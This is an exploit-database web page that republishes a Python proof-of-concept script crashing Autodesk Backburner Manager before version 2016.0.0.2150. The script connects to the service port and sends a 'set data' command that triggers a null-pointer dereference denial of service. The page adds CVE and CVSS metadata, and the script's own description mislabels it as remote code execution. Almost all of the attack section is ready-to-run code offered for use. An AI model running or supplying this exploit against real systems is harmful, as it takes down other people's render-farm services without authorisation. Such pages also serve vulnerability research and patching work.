Advertisement






Autodesk Backburner Manager 3 < 2016.0.0.2150 - Null Dereference DoS

CVE Category Price Severity
N/A CWE-476 N/A High
Author Risk Exploitation Type Date
N/A High Local 2017-01-27
CPE
cpe:cpe:/a:autodesk:backburner:3_lt_2016:0.0.2150
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 0 0

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017010220

Below is a copy:

Autodesk Backburner Manager 3 < 2016.0.0.2150 - Null Dereference DoSimport sys
import datetime
import socket
import argparse
import os
import time
 
remote_host = ''
remote_port = ''
 
def callExit():
    print "\ntt[!] exiting at %s .....\n" % datetime.datetime.now()
    sys.exit(1)
 
def mySocket():
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    except socket.error:
        print 'Failed to create socket'
        sys.exit()
     
    print "\nt[+] Socket Created"
     
    s.connect((remote_host, remote_port))
    print "\nt[+] Socket Connected to %s on port %s" % (remote_host, remote_port)
     
    return s
     
# 250 backburner 1.0 Ready.
def receiveBanner(s):
    banner = s.recv(4096)
    print banner
 
 
def receiveData(s):
    data = s.recv(4096)
    print data
 
 
def setDataCommand(s):
    receiveData(s)          # backburner>
    print "Set Data Command"
    time.sleep(1)
    command = "set data\r\n"
    try:
        s.sendall(command)
    except socket.error:
        print 'Send failed'
        sys.exit()
    print "BackBurner Manager should have crashed"
    receiveData(s)          # 200 Help
    receiveData(s)          # Available Commands:.....and all set of commands
                            # backburner>
 
 
def main():
    if sys.platform == 'linux-i386' or sys.platform == 'linux2' or sys.platform == 'darwin':
        os.system('clear')
 
    parser = argparse.ArgumentParser(description = 'RCE Autodesk BackBurner')
    parser.add_argument('--host', nargs='?', dest='host', required=True, help='remote IP of Autodesk host')
    parser.add_argument('--port', nargs='?', dest='port', default=3234, help='remote Port running manager.exe')
     
    args = parser.parse_args()
     
    if args.host == None:
        print "t[!] IP of remote host?"
        sys.exit()
     
    global remote_host
    global remote_port
     
    remote_host = args.host
    remote_port = args.port
     
    print "remote_host: %s" % remote_host
    print "remote_port: %s" % remote_port
     
    s = mySocket()
    receiveBanner(s)
    setDataCommand(s)
     
    print 'exit'
    sys.exit()
     
     
if __name__ == '__main__':
    try: sys.exit(main())
    except KeyboardInterrupt:
        callExit()

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum